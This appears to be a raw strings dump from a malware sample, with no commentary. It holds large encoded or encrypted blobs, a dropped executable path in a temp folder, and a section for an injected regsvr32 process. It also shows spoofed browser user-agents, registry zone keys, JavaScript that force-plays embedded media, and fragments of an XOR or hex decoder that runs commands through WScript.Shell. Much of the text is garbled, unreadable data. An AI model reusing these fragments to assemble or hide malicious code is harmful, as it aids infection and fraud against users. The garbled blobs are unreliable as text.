tTOFwuJz2YC0fKpts4kJR9uU15hpCl3Ic9igp1oMS77Hpr/6MeMHu7DkBY7jRBBOMa8af3kOwdC7KHIoA3ugO6idmr2mNlnOIPZ02aJF4A7BUmGxq6fAc/d4nsDOKJhYVDSSQ7jFKn0BxkkeEXGn1jlhM30sWUYRiITZB4hz3dELYpaKpOauqQgZJXLMoJUZjswMZcIHw8 hQQZBbCiXHRvYT0LMALC4KzcYhBVimTnaCzF92A/IwjwmuMcLdSrwxeDl hgJ64QRn4shSxTV72EJEeStKbUWop6I3XrGwDJziks02zJZ8Ngv5XQj8/6DVvQGXFx4TWNeBjq bLTDVLKQUg0huyqGeRETme3vgtHptbc3HtKLcy0vfPN7ho3GliJnfIlnwhAqPHR5IA154JiYW0oM7LzXCvf1CKxpj1LiIrZnwB6d7Jtt3Q8QKx 0eOeMKVM0ssWxpfLZL071LCj9dr01FLINneXWUENh HrZMrHiIwMc1UdC1vKZBx pQDZ646bysxGLoBQGMRzGdjCDwvbbfEXBUrd/g9Fb8hisLCdrpwEdRSFKUJPqH3u0UM6aNat6SOaQC2KyCuj XpXuVQl42OBunYjp28FYnjJ69lTqmpbMzQlwbndruPKMFUzTs7exQHCtDnZmeknvkCEDf6KSkltgHq1kAC84KUjHejJtsRDuBx0 zeOZ7k1xdwTTZ6D09GDNmaScqIuJBvxivLT94S5LKC6lFbmV89F32bLDuyMgdZst/wMPHcFbzg05tfs7uTHFvQFFuOLpHnHSgPnuNioE97QtBFTp6b9JZbfpd2gx jCYIjC6 c jSeFFiVxYZXbEZZZwc/YdSdKleWp1mhPeQm3JVaKaTXHwATQyKbAA5StQDJ1vp7z0ktMKi6ccOlyToNIZKAtx2K5VhhYNCQuk3aOczite07juFnr4cqEWU3ExokG73gHNySThVIb7F4aSuWLuvjJBJIPKF40P9iC768a11KJFrEnBjefcP2wz/YSZVEB4nyEQ06n3xYDzUt/F2cZ5JjhDq88rEvlE24 rRGht8HZgCa5XNtR51BNuBt3pp2eW78aCwiOEI8VDbn7AruVqkZrQQyYiz6MehXkTK77WrmjXVq5vzgUt4Jzu0pRfZGETR3S5xfz5uV2giiqXE6lYyjuBM0jm2JNf nUn iN35Go8p0Li5fuLrpjddQ1dFuKdDNclSXqPKGbcZU125ad0veW6dcXfvAw/P9kMO8/TKTtnfOw8XBDk2xHFOeyXOK/91hTRYgWLfAdC40pzwnNwRaWu2Aaw/vVSJQ/gFTtm5GDHCSIcKgmANglVtydNm8YkauqtmguErNundREO/6Xo5XpIF3kajshYV/7KjUgwJi9iqoftmRJ94/Tnr70imCuitzO5r81yZ3k1z4U 9Me8weKT69PB2aJTIMhrak6AV 2frGulcO1ju8IPk7W8QOYSGWq cymI4z/Bz5J1hFhMdrMzlFpBMzPF5zagQCDIFZV1HxA/RIEJeOKSZ4Sh1I 9/BXsFpOpr2zx DNvJXmpvgC81f5ca1ECBLO/o23asth4rsaKfBTvd5V ATraypf 5cH1w0H28a4Eb/Ho1gl2smdg5cfdBCyocaFQDyIhrgvO7l5RCcuG3sdDcbJzIvOHqtH8pP0vLIc1VLyyMD3b7vBzGSOxGaKGHNKEu/tR524QME0URfvXsGZU8fGNDZ3DE10bOQXQowrs34DwRQV3hyjTDDars/0rORfN73HxM NtO/9LTyB1neFGw7bd2xFjJ2 3mCbtmCg8m3ZfOK05dJ4zWtSUplLfpExGp NvDcwcq6kkSmvNjPrOG3lzUOkNU5LFwX fTSCdGTCfQ N7KO1iQp/ daGpiDbXS 1MYRI956xhzL6PchxIYyRYVOWPUSHrfgnlyaWcxAMhaj03mV4zdJncZwfgv/Dp1uMJAS0hikYb4RZOGHA7dU9G9T9SKw3OKguTYyrTdA55njE7WjvmI4MENhf2qDHPZ9g1qUSFArRTPUCG7yzx1NnKVcWcY7HkEV0j 9CGlVGrJ1 MiBpVEqzDY0vUeOH275PySs/rqsXNDJpLbNDmE0lbRtaNaOy3a3Tqdhx7Jx0Z84NQ9dllnjga9w XIiFWm5OwD P3yTbjqWPOTitm6HJkdvvvlBcOQSs8xyA9/Dvi/Uq0 rvcAOzBFRMoXpegqOp4ABA3rVGt6ooxDsMypVtyWhxdVWhkVraQr uMTeCoYUzwKWcOAP1AemeqcpTP6gxooeAaaTiEWs1Zs6 iB9 lIvynIWBmiCIJPTRXStMLo0r/dEUj4CiHg45RQB2syBda9JjdY0XGYeCNCLbz1JIZ27UeD6bi2aM/5n3a9MMny52SDEyjfO7Fm/sgwJu9KyKQtZOsuBOAU3iF4mpGB7NSG9y4I1fUVKO/QPr/Ri5wmz Zni3fuAEWTwd03qfK8ywZK0b5lagpTXuDab20 x86fQueLed2rRyaNQHQ4A/K7LlV/wNztP1gOQWKd/XqmkNNTUA3YqcXgA7 fFh0DdaKIz3ux5YYm6WpoR IjvZI0DudKoBDT5vbcg7awPBaPHmiwNi7krMp/wRhFAQ51N3v214gjeaW1j6bMR3lA9SoI3D7f1UnUxeMVlpAi9NPSkr/bs3ww4vgTkH3mWPh6JMWUXZ9/JW9DUb44EbqU sZnH33VZYhTRXvzPbeM33RlQ5PN4a5junE3q9tDwTu/7TzGARQvjLcA OST6QkmSObIMuhwG29jbvnhbVkBoBF87U3y9At2usdlnDTqn4XpLgEzr7y2hW28IwB1IMTp9Lc6bs/CzxMTIhGomY3XuLHQwzR1JP47OS7oEmIqKqem/ZsWC1L6lxU8Ij7UPvlreS4ivFjOEkMFyOaba3a8HZ73Sz64k5kbCOaBgeIe73I3WYHege7t2AgsSmDfb mNbiqCpwT 8n/rYk/wFRgOhtF96FVrvKvvPQztLJTcWvQXDm8uncg auwcf KcNWpM5EsstUrJCnazVk28hDtvnVNw73zsmW6HORlfumWpVIqHmVaZ3GKzvu2/WkM9D76zHfFGxzSTmu/QY3v1nk3Z38ky 4FH5uyR0svcFUUmMICwF5 PubCdBq1XivsKGdcDKqwIagfL65CWPpHVBYhoPyPi/s1qIx5KPp/huaJWUkExnCC33e3S0XEoYM0ZtV6U08/fgJph0RqHyYg02Xf6Y3oM t5bEe2pKglGlExbApVTV6ZLKYKGPfbJuZQbAXCC5y8kZBk8efHtSk1OJqVXdBdu3xPesAqf5c8O5VK3gsoeZaEF0FCxBKj tz9vYZC02eQe6 suEpXVRAPmlwFByKUJyGIItA9 1hCBMuyNl sEz8p2qAH4aRiN3EeO3FcpPLwI3V4H6WVQOH2cR QoDJqfl1MzjOtbYnwZ2z2o j3EoDrkuN/dNQdwGlWXgYp2Ka4Dokjf N0l9jtdDeqcVIT7UnPxNobPutRirxsSJ2ykiPosbCuSmGJ2luJnNB2f544LQeD6Ywu5gBT7NC0CmN0zdiF//uq1mIzekizAnyOUYWpRppij5I9dhei3EuFxJKPvu9NohC121dVsh5GLiNcJ2rv2cLEjUiCN0mWy5nFaDe9yEG6Q4LUEw3h3spbcwkKgq3InOIXH5xyQL9R8ycznUoXgaMzAr/ISItqIw9JINdKxGL1  qjfEem6MYgVVsr/8choKvCW3007EyRqptoTDlADiu91orLcl0PbNb7BwNmfZYMYrAImr/ByyAPFLZO87xv/oBB pPVyNCJs p1FNOzmfv5NFa1bvC4f37nMbd9Udx/OikdZavj1wdDGzMX6oViwK VhwR r12DcYln6G6K0FiXQ7tHi5yP9RVPmiN76S1Vy2nlwA iOB3Pn9dU98LHhqob7bNx2VH7r 236DG4JEQj2rNOyrvDHeBZILrP8gpgQsyXAK/vkBtS6zefT5U985ibWtURWUNfHZ7CKJTgnao30Yvix7ONG9X55dsRcEJsMjn79ri1ggH4W1QbM5WFZMBPGSQDmCo6BJVEA0zw/H8OzA94G/meiuKtFGBET2kEJBXkiJ/Nj45RwF7GioMHDh2nVKeM9RtLi6QkyJY2F5p6JgfdOCy7Vb0zpCLzR/gTcI/SBE9fJEe2RdzbBEkIiIq/e5XXzdy5VE264JbYDhVUzkYqT5m5RvpQ1WaoYNLOogRS9kKjsthNMNbpWOOQIkjLaVTReY/CY S7dhLpEDz0n8gwdM2U/R8nu lECUYqEY2N5p3IRtfbkQ9BtlwlQBIFOblFccd1kks7s/p1tH9FyODzisTiaABwyIHBYjwJzod99fLPtGtDZ7wcJ 1TEaSyCWhxPcVqtsARsxgh8oGIM6Xyf9znVVg1pA4Ls5zfs/DfcZ7hLlvE6nzJh22z/9mdImznshhlPfIfcQ2rF97V9mikNxuGTNrfqHPJZPeBpwxJV5C918ybmhlPrOMKMJJmJKxJaM1i lyVp78eTRLF72u3n y3dEq5vOTbnCXE4gE61szPbjUc0NMmtPxnVrhoOajBwJyk7ozqJbZgxLPzF1gH0DvcrYPeUs/uFzXDlXwa/qB6C08bQDsH50J6UqQV67oX8HY4h28v49y7cUWUYt3Mcy8NznHD4clKGtsQJPldyCkekfi/tch9lmECxVI197U/93trIQrhvZKJtY c/pZlRliwqVhofXEh6c GUXPX1LEmI6YdIyElqCybGJFGlXYOTqNm3O4kuiUxZqPSmKBJ6QWuFIaJzSyZl Jg6uvi9mooC6CdqR Sx/PpLqV5cD7gnw66FcLDxTKXnvGFig9K/EVh cmYE/SWPl4i C2WAtSKZol6vKAbpi0JDfpAwb9eAx60GySErBYDPFQ9hV3OljxOyq9UBEM7OJk5Aot0tIA1CGT/TCL/Vw1eo6OBnKsvR2JwX5jtOhDXdZhbnLwIkjd8RNGb5Or93MOW7B2hKPfdUco6zV0CD GBCjois1LL6loZ33mdpD8QLjmSEjX0/DL iWQ9IThcbkpRV Z7qGXywNr4r4/WCNuOhUdugAlxgkLBloP2ipBDB7QYyEtUGgH0RAmE9n9dAqB6knCSFBq3L6G2EEv4CWMS6DrR8HgXt1rr10mz9JtQ2PQarG7zMxWyQG21w9uyT7EVBX0nir8Em95NT7X8HStIfGYMPIJ7xRUHkdxTx1pjFxzQWOVJcvKa5w5gpA1Xov1wrHpdWD8VCTFAkBfv6EfxUVSGGb OLa  MIsuuFY/WMhOOjwsujPMZPJFSW2Y7j2SkgtkTZ1FeXEraT6BPM7U zzi5szN0vXyzFMvIo5Uu3QUtJltqCVCohBgY7/cZ4po1gxL/va0HsYcxv6YwPJJq231t4rXLJ4hEOJTz6mvJMMrKz YdO2V/8UuI/pTD9KAcgsxdDp3oZfJbpfx6IsM7eT4F4LNHw695TSM/EgyiIV581yI4nPHNJfxYJ3aXrKI/3oIfmjG5gTZoe2McS7IyDT73KBBL wXfPBKnSRgaxj K0wDIqHpjJaK27UUZG3flQM8RX4q6hgjJQAqMhZIVJC0Z 7Dqg W9gui9 BPwTi Bqco9TXX1ju293YfVWajIe0 8BnvnmJTS7gXqFAa1mfLcZdM5cNsSj9nMiIS2FHcOHeeP2JHy5f6msa9r8wDpSmetJ1Guhf/C2rJjqA1EiQOJR4KXy2JsQtn7ahmRbDcY G6YukhUP0gjCjRqtEU8rs2S4RcsoHfAdO3UQGzwcST73Hohg6n6bH5Cu4obOlXvg0rdvbOw c6cCdEDHeWh0CwfWaSI/SslwL70DERLEDhjXDKdOxSgGBeryK0W75m2KDjcseqV9wxpZADM2II2XjrMCEMtQk29iUS9b7S2FBU0ncF3XHjttNqI5R2UimjOo57C2ESUqn3wK/uP490uI0 7Knr4OD5qc95H8/8eJz7CuIEx882f9Yd6goaCtChnBv8rzwUeH86vGTG4bmRKOX5H9ztPQHDO3hox1rmLXrgZTotKRmtyAS7MrB0pjZdQxu3vRyEsyLDy2YBQv5/y6ZSlRTI6oOhJO2C4c0pkOfdLrvRwAm2nHagci47ExA5k0xvoqK8mXydCQkOZGRJHon9SYqoVthUvfRwAxWXA6zllWTNb 8W8aXHc8YGcqpAQxuzLvTQZwW8C3/N DKFK3YyXVo54wu/Oo/LtmaZ0OVNKovH4LoOJSyLuqOmF4da2wdbd77pp2r5XYBc ri7Zsv6i makju6nos7WqQ/Fo9hG2tQGHoHz6srqQ7B0L3IKlvePezzzcwvn6qQE4Z5 yiNA wRJjVJSrGVBploFCMCA7VJYsAOUIr3FkxwmWYd K7d4f8ara5D20P2vzQoSY//YOLNyQWbRdcmie/jm8 tkLoO9qkJ Si4Q/rhOb229XRmnZmkv87KPDRLK5P5Kdl 1Gh0f7yRCGMQWlAnzmIzSWl6ufjKsy4OHw Ibg4fapFDoByZKKUxMyFFp1o2SuA/H6O5bu0GRvqoVpCNbSMRqVB7cRO8wM0/emO7ftHvENtuW9oujk85  Jjhu0zrH6iEIVxZm9cojZMHUd2B WJfdOdPhNO710 x2l8hXOaqLDguLjZsgHlYR0M6IxlfJvivhj5MHOTRT1y4uxyTTlYgZFGyMXDgAKB2jXI3Cty0vZUTp5Q9PNpbLSoZGc/zw4/TpKWXyzfAHlkkibwotw2OYzUOgtbggg4jpmlBoT2JOao1ctkr2d3UBmAy8XpvspvnBX/xvpdRL/1QMys=lRCPASX27nuqqN0rPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD"
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
66006666
"c:\docume~1\"%CurrentUserName%"\locals~1\temp\tmpf7521b9d\bindata865.exe" path<<c:\docume~1\"%CurrentUserName%"\locals~1\temp\tmpf7521b9d\bindata865.exe>>path inj_ffile<<:2:>>inj_ffile

regsvr32.exe_3384:

.idata
.reloc
P.rsrc
Portions Copyright (c) 1983,99 Borland
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion
wininet.dll
user32.dll
ntdll.dll
Kernel32.dll
URLMON.DLL
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
PSAPI.dll
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].play();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].Play();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].PLAY();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].play();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].Play();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].PLAY();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].playVideo();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].playVideo();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].start();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].Start();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].START();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].start();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].Start();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].START();}} catch(e){}
try {var els=document.getElementsByTagName('video'); for(var i=0;i<els.length;i  ){ els[i].play();}} catch(e){}
try {jwplayer().play()} catch(e){}
IWebBrowser
IWebBrowserApp4
IWebBrowser2l
.length;
 =String.fromCharCode(parseInt(
.substr(
,2),16));
 =String.fromCharCode(
,1).charCodeAt()^
,1).charCodeAt());
.length-1)?
=new ActiveXObject("WScript.Shell");
.Environment("Process"))("
.Run("
=new ActiveXObject("WScript.Shell");
.RegRead("
psapi.dll
HTTP/1.1
\\.\LCD
1234567890
Shell32.dll
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
0123456789
Mozilla
?456789:;<=
!"#$%&'()* ,-./0123
.text
`.rdata
@.pdata
KERNEL32.dll
@.reloc
222.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
oleaut32.dll
RegOpenKeyExW
RegDeleteKeyW
RegCreateKeyW
RegCreateKeyA
version.dll
SetProcessWindowStation
OpenWindowStationA
EnumChildWindows
HttpSendRequestA
HttpOpenRequestA
FindNextUrlCacheEntryA
FindFirstUrlCacheEntryA
FindCloseUrlCache
DeleteUrlCacheEntry
ole32.dll
wsock32.dll
winmm.dll
atl.dll
wtsapi32.dll
Wtsapi32.dll
PSAPI.DLL
shell32.dll
ShellExecuteExW
NtQueryValueKey
NtDeleteValueKey
NtSetValueKey
urlmon.dll
UrlMkSetSessionOption
4"4,414?4
3,313[3`3
829<9]9~9
=.=3=[=`=
>!>&>7><>
7)707;7@7
= =$=,=_=
?0'101>1
: :&: :}:
?,?;?@?^?
8 8$8(8,808
c2h3PgXWqt2QzTRrb/AnQFC6SRUgWch7j77TVxtWrXEisi5gWjLIKgQWWPjhp0UgEz/kVUGNipnIPLZxi8BxUOwd9J5DQbsosxVqooPcMxy2MFTKpmT8aROKg4jgPL5ULF6ilWRorquC8m0XR dR8hd6QeMVN1z8qMkD1vqxgm4LrkB3rrUobN/saPP2hYsk6VQTT5huKnOMVL5caR5vadBp7OdRzhgDnQIi0zuYfIv v02VfY9J3rrQjqC1  pFYIFt3Gp4UAQmbDJLGUi8hvJ5jIHnHXh6ZdE G2FTkJ3CI2Lj2wf8fOmqGCNuCUBH6Ec7vvAylDcuOVeqr6H9 GqsS1IfkCCllztP/uhBjWjey5V SSDAqDhRCVH uTCvACRGgad bO9wKfoRWb20kkPK8CJRO3Cb3ZBKGOeh51oRkebuOLldMrwBX33FmSkln88u4JdiIX3EOwtJpJ8fNuFb9sVJKqbY0xHN8Kq1Or8RhXvuFhn9jvExwsg77Nm9pukUDgOKXK2YjwzI43i2jlgqjXRjPGNPPw8yrBpOYbuqtlz4xPvXSChtWkqlonwCNmHPfYIqUJsozXDoUSntJjEjPKcnSYnNd4VI/OTKRZl4s3QZK4AiriXs m2G8zO3JfYHA4Mzloj7x/ZrAhvhzeMKq4FLKRhJG4T2JXyLgwvQjwXdohUQg4iEYHpcny L36V4uUkFcvU1tvpqDtiOQYa70HHcPEJfYLV8Toym38KdYL9IJPqUdop utIX7HhaldlXLQIAz7PWZnlHKctlhe5qmCRh7GYrijRosE0KLIyPrqsKKjC7bEFYXy01KABfO qe1pH4Q6vjT2LIWDeAU0QF7cNTSc9IrXxuiKrH9fzzDBmL0r2uP90MTpzx4Q6QXF6LFGMM4bSQRJvDy82dHpceQb5 wSJiwXfI1q0lw2j7yeKKU4d1S2yu1KSDqXTy9EIbNA OTz83nYnlm92yC4Q C1WaY TFWNwLLReTWs1XYS 5ycpe2nbJMnH2nWskkuEycGRyOKeWv9mBEriqVlrPdTjCXGsosq0/ze tTOFwuJz2YC0fKpts4kJR9uU15hpCl3Ic9igp1oMS77Hpr/6MeMHu7DkBY7jRBBOMa8af3kOwdC7KHIoA3ugO6idmr2mNlnOIPZ02aJF4A7BUmGxq6fAc/d4nsDOKJhYVDSSQ7jFKn0BxkkeEXGn1jlhM30sWUYRiITZB4hz3dELYpaKpOauqQgZJXLMoJUZjswMZcIHw8 hQQZBbCiXHRvYT0LMALC4KzcYhBVimTnaCzF92A/IwjwmuMcLdSrwxeDl hgJ64QRn4shSxTV72EJEeStKbUWop6I3XrGwDJziks02zJZ8Ngv5XQj8/6DVvQGXFx4TWNeBjq bLTDVLKQUg0huyqGeRETme3vgtHptbc3HtKLcy0vfPN7ho3GliJnfIlnwhAqPHR5IA154JiYW0oM7LzXCvf1CKxpj1LiIrZnwB6d7Jtt3Q8QKx 0eOeMKVM0ssWxpfLZL071LCj9dr01FLINneXWUENh HrZMrHiIwMc1UdC1vKZBx pQDZ646bysxGLoBQGMRzGdjCDwvbbfEXBUrd/g9Fb8hisLCdrpwEdRSFKUJPqH3u0UM6aNat6SOaQC2KyCuj XpXuVQl42OBunYjp28FYnjJ69lTqmpbMzQlwbndruPKMFUzTs7exQHCtDnZmeknvkCEDf6KSkltgHq1kAC84KUjHejJtsRDuBx0 zeOZ7k1xdwTTZ6D09GDNmaScqIuJBvxivLT94S5LKC6lFbmV89F32bLDuyMgdZst/wMPHcFbzg05tfs7uTHFvQFFuOLpHnHSgPnuNioE97QtBFTp6b9JZbfpd2gx jCYIjC6 c jSeFFiVxYZXbEZZZwc/YdSdKleWp1mhPeQm3JVaKaTXHwATQyKbAA5StQDJ1vp7z0ktMKi6ccOlyToNIZKAtx2K5VhhYNCQuk3aOczite07juFnr4cqEWU3ExokG73gHNySThVIb7F4aSuWLuvjJBJIPKF40P9iC768a11KJFrEnBjefcP2wz/YSZVEB4nyEQ06n3xYDzUt/F2cZ5JjhDq88rEvlE24 rRGht8HZgCa5XNtR51BNuBt3pp2eW78aCwiOEI8VDbn7AruVqkZrQQyYiz6MehXkTK77WrmjXVq5vzgUt4Jzu0pRfZGETR3S5xfz5uV2giiqXE6lYyjuBM0jm2JNf nUn iN35Go8p0Li5fuLrpjddQ1dFuKdDNclSXqPKGbcZU125ad0veW6dcXfvAw/P9kMO8/TKTtnfOw8XBDk2xHFOeyXOK/91hTRYgWLfAdC40pzwnNwRaWu2Aaw/vVSJQ/gFTtm5GDHCSIcKgmANglVtydNm8YkauqtmguErNundREO/6Xo5XpIF3kajshYV/7KjUgwJi9iqoftmRJ94/Tnr70imCuitzO5r81yZ3k1z4U 9Me8weKT69PB2aJTIMhrak6AV 2frGulcO1ju8IPk7W8QOYSGWq cymI4z/Bz5J1hFhMdrMzlFpBMzPF5zagQCDIFZV1HxA/RIEJeOKSZ4Sh1I 9/BXsFpOpr2zx DNvJXmpvgC81f5ca1ECBLO/o23asth4rsaKfBTvd5V ATraypf 5cH1w0H28a4Eb/Ho1gl2smdg5cfdBCyocaFQDyIhrgvO7l5RCcuG3sdDcbJzIvOHqtH8pP0vLIc1VLyyMD3b7vBzGSOxGaKGHNKEu/tR524QME0URfvXsGZU8fGNDZ3DE10bOQXQowrs34DwRQV3hyjTDDars/0rORfN73HxM NtO/9LTyB1neFGw7bd2xFjJ2 3mCbtmCg8m3ZfOK05dJ4zWtSUplLfpExGp NvDcwcq6kkSmvNjPrOG3lzUOkNU5LFwX fTSCdGTCfQ N7KO1iQp/ daGpiDbXS 1MYRI956xhzL6PchxIYyRYVOWPUSHrfgnlyaWcxAMhaj03mV4zdJncZwfgv/Dp1uMJAS0hikYb4RZOGHA7dU9G9T9SKw3OKguTYyrTdA55njE7WjvmI4MENhf2qDHPZ9g1qUSFArRTPUCG7yzx1NnKVcWcY7HkEV0j 9CGlVGrJ1 MiBpVEqzDY0vUeOH275PySs/rqsXNDJpLbNDmE0lbRtaNaOy3a3Tqdhx7Jx0Z84NQ9dllnjga9w XIiFWm5OwD P3yTbjqWPOTitm6HJkdvvvlBcOQSs8xyA9/Dvi/Uq0 rvcAOzBFRMoXpegqOp4ABA3rVGt6ooxDsMypVtyWhxdVWhkVraQr uMTeCoYUzwKWcOAP1AemeqcpTP6gxooeAaaTiEWs1Zs6 iB9 lIvynIWBmiCIJPTRXStMLo0r/dEUj4CiHg45RQB2syBda9JjdY0XGYeCNCLbz1JIZ27UeD6bi2aM/5n3a9MMny52SDEyjfO7Fm/sgwJu9KyKQtZOsuBOAU3iF4mpGB7NSG9y4I1fUVKO/QPr/Ri5wmz Zni3fuAEWTwd03qfK8ywZK0b5lagpTXuDab20 x86fQueLed2rRyaNQHQ4A/K7LlV/wNztP1gOQWKd/XqmkNNTUA3YqcXgA7 fFh0DdaKIz3ux5YYm6WpoR IjvZI0DudKoBDT5vbcg7awPBaPHmiwNi7krMp/wRhFAQ51N3v214gjeaW1j6bMR3lA9SoI3D7f1UnUxeMVlpAi9NPSkr/bs3ww4vgTkH3mWPh6JMWUXZ9/JW9DUb44EbqU sZnH33VZYhTRXvzPbeM33RlQ5PN4a5junE3q9tDwTu/7TzGARQvjLcA OST6QkmSObIMuhwG29jbvnhbVkBoBF87U3y9At2usdlnDTqn4XpLgEzr7y2hW28IwB1IMTp9Lc6bs/CzxMTIhGomY3XuLHQwzR1JP47OS7oEmIqKqem/ZsWC1L6lxU8Ij7UPvlreS4ivFjOEkMFyOaba3a8HZ73Sz64k5kbCOaBgeIe73I3WYHege7t2AgsSmDfb mNbiqCpwT 8n/rYk/wFRgOhtF96FVrvKvvPQztLJTcWvQXDm8uncg auwcf KcNWpM5EsstUrJCnazVk28hDtvnVNw73zsmW6HORlfumWpVIqHmVaZ3GKzvu2/WkM9D76zHfFGxzSTmu/QY3v1nk3Z38ky 4FH5uyR0svcFUUmMICwF5 PubCdBq1XivsKGdcDKqwIagfL65CWPpHVBYhoPyPi/s1qIx5KPp/huaJWUkExnCC33e3S0XEoYM0ZtV6U08/fgJph0RqHyYg02Xf6Y3oM t5bEe2pKglGlExbApVTV6ZLKYKGPfbJuZQbAXCC5y8kZBk8efHtSk1OJqVXdBdu3xPesAqf5c8O5VK3gsoeZaEF0FCxBKj tz9vYZC02eQe6 suEpXVRAPmlwFByKUJyGIItA9 1hCBMuyNl sEz8p2qAH4aRiN3EeO3FcpPLwI3V4H6WVQOH2cR QoDJqfl1MzjOtbYnwZ2z2o j3EoDrkuN/dNQdwGlWXgYp2Ka4Dokjf N0l9jtdDeqcVIT7UnPxNobPutRirxsSJ2ykiPosbCuSmGJ2luJnNB2f544LQeD6Ywu5gBT7NC0CmN0zdiF//uq1mIzekizAnyOUYWpRppij5I9dhei3EuFxJKPvu9NohC121dVsh5GLiNcJ2rv2cLEjUiCN0mWy5nFaDe9yEG6Q4LUEw3h3spbcwkKgq3InOIXH5xyQL9R8ycznUoXgaMzAr/ISItqIw9JINdKxGL1  qjfEem6MYgVVsr/8choKvCW3007EyRqptoTDlADiu91orLcl0PbNb7BwNmfZYMYrAImr/ByyAPFLZO87xv/oBB pPVyNCJs p1FNOzmfv5NFa1bvC4f37nMbd9Udx/OikdZavj1wdDGzMX6oViwK VhwR r12DcYln6G6K0FiXQ7tHi5yP9RVPmiN76S1Vy2nlwA iOB3Pn9dU98LHhqob7bNx2VH7r 236DG4JEQj2rNOyrvDHeBZILrP8gpgQsyXAK/vkBtS6zefT5U985ibWtURWUNfHZ7CKJTgnao30Yvix7ONG9X55dsRcEJsMjn79ri1ggH4W1QbM5WFZMBPGSQDmCo6BJVEA0zw/H8OzA94G/meiuKtFGBET2kEJBXkiJ/Nj45RwF7GioMHDh2nVKeM9RtLi6QkyJY2F5p6JgfdOCy7Vb0zpCLzR/gTcI/SBE9fJEe2RdzbBEkIiIq/e5XXzdy5VE264JbYDhVUzkYqT5m5RvpQ1WaoYNLOogRS9kKjsthNMNbpWOOQIkjLaVTReY/CY S7dhLpEDz0n8gwdM2U/R8nu lECUYqEY2N5p3IRtfbkQ9BtlwlQBIFOblFccd1kks7s/p1tH9FyODzisTiaABwyIHBYjwJzod99fLPtGtDZ7wcJ 1TEaSyCWhxPcVqtsARsxgh8oGIM6Xyf9znVVg1pA4Ls5zfs/DfcZ7hLlvE6nzJh22z/9mdImznshhlPfIfcQ2rF97V9mikNxuGTNrfqHPJZPeBpwxJV5C918ybmhlPrOMKMJJmJKxJaM1i lyVp78eTRLF72u3n y3dEq5vOTbnCXE4gE61szPbjUc0NMmtPxnVrhoOajBwJyk7ozqJbZgxLPzF1gH0DvcrYPeUs/uFzXDlXwa/qB6C08bQDsH50J6UqQV67oX8HY4h28v49y7cUWUYt3Mcy8NznHD4clKGtsQJPldyCkekfi/tch9lmECxVI197U/93trIQrhvZKJtY c/pZlRliwqVhofXEh6c GUXPX1LEmI6YdIyElqCybGJFGlXYOTqNm3O4kuiUxZqPSmKBJ6QWuFIaJzSyZl Jg6uvi9mooC6CdqR Sx/PpLqV5cD7gnw66FcLDxTKXnvGFig9K/EVh cmYE/SWPl4i C2WAtSKZol6vKAbpi0JDfpAwb9eAx60GySErBYDPFQ9hV3OljxOyq9UBEM7OJk5Aot0tIA1CGT/TCL/Vw1eo6OBnKsvR2JwX5jtOhDXdZhbnLwIkjd8RNGb5Or93MOW7B2hKPfdUco6zV0CD GBCjois1LL6loZ33mdpD8QLjmSEjX0/DL iWQ9IThcbkpRV Z7qGXywNr4r4/WCNuOhUdugAlxgkLBloP2ipBDB7QYyEtUGgH0RAmE9n9dAqB6knCSFBq3L6G2EEv4CWMS6DrR8HgXt1rr10mz9JtQ2PQarG7zMxWyQG21w9uyT7EVBX0nir8Em95NT7X8HStIfGYMPIJ7xRUHkdxTx1pjFxzQWOVJcvKa5w5gpA1Xov1wrHpdWD8VCTFAkBfv6EfxUVSGGb OLa  MIsuuFY/WMhOOjwsujPMZPJFSW2Y7j2SkgtkTZ1FeXEraT6BPM7U zzi5szN0vXyzFMvIo5Uu3QUtJltqCVCohBgY7/cZ4po1gxL/va0HsYcxv6YwPJJq231t4rXLJ4hEOJTz6mvJMMrKz 